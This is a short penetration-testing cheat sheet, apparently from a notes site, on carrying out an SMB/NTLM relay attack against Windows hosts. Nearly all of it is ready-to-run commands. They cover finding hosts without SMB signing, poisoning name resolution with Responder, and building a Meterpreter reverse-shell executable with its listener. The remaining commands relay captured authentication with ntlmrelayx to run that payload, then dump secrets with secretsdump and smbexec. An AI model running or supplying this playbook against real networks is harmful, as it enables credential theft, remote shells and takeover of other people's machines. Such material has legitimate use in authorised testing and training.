SMB Replay
SMB Replay
Check if we have a target for SMB relay.
# Change the IP range for your target
crackmapexec smb 10.0.0.0/24 --gen-relay-list /tmp/targets.txt
Check the SMB signing requirement. You should look for a host with 445 port open and Message signing enabled but not required or Message signing is disabled.
nmap --script=smb2-security-mode.nse -p445 10.0.0.0/24

Start Responder. Ensure you disable SMB server and HTTP server on conf.
# Ensure you configured the /etc/responder/Responder.conf file to disable SMB server and HTTP server.
sudo responder -I eth0 -PvdDw
# For -e option (execute), you will get a reverse shell.
Kali> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.208 LPORT=80 -f exe -o rshell.exe
Kali> sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.0.0.208 ;set LPORT 80;run -j"
# then, run Responder
sudo responder -I eth0 -PvdDw
Start NTLM relay.
ntlmrelayx.py -smb2support -tf attacklist.txt
# -e option
ntlmrelayx.py -smb2support -tf /tmp/targets.txt -e ./rshell.exe --no-http-server
Login to a vulnerable target and access to the Kali SMB file share.
# From Target Windows, connect back to Kali.
CMD> Copy a.txt \\10.0.0.208\smb

If you get an Administrator credential (NTLM hash), try the following commands.
Kali> proxychains4 -q secretsdump.py FILE01/Administrator:anypassword@10.0.0.59
Kali> proxychains4 -q smbexec.py FILE01/Administrator:anypassord@10.0.0.59
Last updated